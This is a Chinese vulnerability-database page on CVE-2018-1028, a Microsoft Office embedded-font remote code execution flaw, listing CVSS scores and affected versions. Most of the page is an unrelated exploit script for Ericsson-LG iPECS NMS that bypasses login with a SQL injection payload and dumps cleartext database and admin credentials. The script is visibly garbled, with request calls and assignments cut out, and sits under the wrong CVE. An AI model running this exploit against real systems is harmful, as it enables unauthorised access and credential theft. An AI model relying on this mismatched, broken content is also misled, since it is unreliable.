发布时间 :2018-04-11 21:29:10
修订时间 :2018-05-21 13:56:23

[原文]A remote code execution vulnerability exists when the Office graphics component improperly handles specially crafted embedded fonts, aka "Microsoft Office Graphics Remote Code Execution Vulnerability." This affects Word, Microsoft Office, Microsoft SharePoint, Excel, Microsoft SharePoint Server.



- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD

- 其它链接及资源

- 漏洞信息 (F147351)

Ericsson-LG iPECS NMS A.1Ac Credential Disclosure (PacketStormID:F147351)
2018-04-25 00:00:00
Berk Cem Goksel  
exploit,vulnerability,info disclosure

Ericsson-LG iPECS NMS version A.1Ac suffers from a cleartext credential disclosure vulnerabilities.

# -*- coding: utf-8 -*-
# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump
# Vendor Notification: 03-03-2018 - No response
# Initial CVE: 04-04-2018
# Disclosure:  21-04-2018
# Exploit Author: Berk Cem GAPksel
# Contact: ||
# Vendor Homepage:
# Version: A.1Ac and possibly earlier
# Tested on: Windows 2008 R2 x64
# CVE-2018-9245:  Multiple SQL injections
# CVE-2018-10285: Incorrect access control
# CVE-2018-10286: Sensitive information disclosure
# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive
# information such as cleartext database and NMS login credentials, use incorrect
# access control mechanisms, are vulnerable to MiTM attacks and are prone to
# SQL injection attacks on multiple parameters.
# This script dumps some sensitive information.
# Why use it?
# Normally, you can bypass the login through the SQLi but will get "kicked out".
# Thankfully, we can leverage this to extract the actual admin credentials for
# the web app. In order to do this, we must first dump the database
# credentials in cleartext.
# Usage = python IP_adress port
# Example = python 80
from sys import argv
import sys
import os
import time
import requests
import re
if len(argv) != 3:
    print "The script takes two mandatory arguments."
    print "\nExample usage:  python 80"
#Log in through SQLi. Otherwise the next POST request is rejected.
sqli_path = "/nms/php/module/main/main_login.php"
sqli_url = "http://" + IP + ":" + port + sqli_path
sqli_cookies = {"mainTab_selectedChild": "sysinfoTab"}
sqli_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
sqli_data={"id": "1", "passwd": "1' or 1=1--"}
r =, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data)
print(r.status_code, r.reason)
#Thanks to incorrect access control we can
#dump cleartext database credentials
dump_path = "/nms/php/module/main/main_start.php"
dump_url = "http://" + IP + ":" + port + dump_path
nms_cookie = {"mainTab_selectedChild": "sysinfoTab"}
nms_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
nms_data={"command": "nms_start", "client_id": "20"}
r2 =, headers=nms_headers, cookies=nms_cookie, data=nms_data)
print(r2.status_code, r2.reason)
db_cred_dump = r2.content
#Extract db user and db pass from the dump
m ="db_user:'(.*)'.*db_pwd:'([^']*)", db_cred_dump)
if m is not None:
    postgre_db_user =
    postgre_db_pwd =
    print "Something went wrong parsing the credentials. Check the dump manually."
client_id = "2" #Doesn't really matter
user_id = "10" #Doesn't matter either
db_user = postgre_db_user # This does matter
db_pwd =  postgre_db_pwd #  So does this
#Use db user and password to extract admin credentials for the NMS
users_path = "/nms/php/module/init/module_init.php"
users_url = "http://" + IP + ":" + port + users_path
users_cookies = {"mainTab_selectedChild": "sysinfoTab"}
users_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
users_data={"command": "init_configuration", "client_id": "2", "user_id": user_id, "db_user": db_user, "db_pwd": db_pwd, "mfimSeq": "0", "req_system_id": "0", "req_system_name": ''}
r3 =, headers=users_headers, cookies=users_cookies, data=users_data)
print(r3.status_code, r3.reason)
user_dump = r3.content
print "Done. You can log in to the postgresql database using the below credentials."
print "\ndb_user: " + postgre_db_user
print "db_pwd: " + postgre_db_pwd
print "\nAnd/Or you can log in to the NMS using the following credentials"
m1 ="userList:\[\[\d,'([^']*)','([^']*)", user_dump)
if m1 is not None:
    nms_admin =
    nms_pwd =
    print "\ndb_admin: " + nms_admin
    print "db_pwd: " + nms_pwd
    print "\nDid not get nms_admin and nms_pwd. Check the dump manually."
dumpfile = open("ipecsnms_dump.txt","w")
print "\nRaw output written to ipecsnms_dump.txt for further username and group enumeration."
print "Have fun!"


- 漏洞信息

Microsoft Office CVE-2018-1028 Remote Code Execution Vulnerability
Design Error 103641
Yes No
2018-04-10 12:00:00 2018-04-10 12:00:00
Jaanus Kaap of Clarified Security

- 受影响的程序版本

Microsoft Word Automation Services on Microsoft SharePoint Server 2013 Service Pack 1
Microsoft Word Automation Services on Microsoft SharePoint Server 2010 SP2 0
Microsoft SharePoint Server 2013 SP1
Microsoft SharePoint Enterprise Server 2016 0
Microsoft Office Web Apps Server 2013 SP1
Microsoft Office Web Apps 2010 SP2
Microsoft Office 2016 (64-bit edition) 0
Microsoft Office 2016 (32-bit edition) 0
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 RT Service Pack 1 0
Microsoft Office 2010 Service Pack 2 (64-bit editions) 0
Microsoft Office 2010 Service Pack 2 (32-bit editions) 0
Microsoft Excel Services on Microsoft SharePoint Enterprise Server 2013 Service Pack 1

- 漏洞讨论

Microsoft Office is prone to a remote code-execution vulnerability.

An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.

- 漏洞利用

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at:

- 解决方案

- 相关参考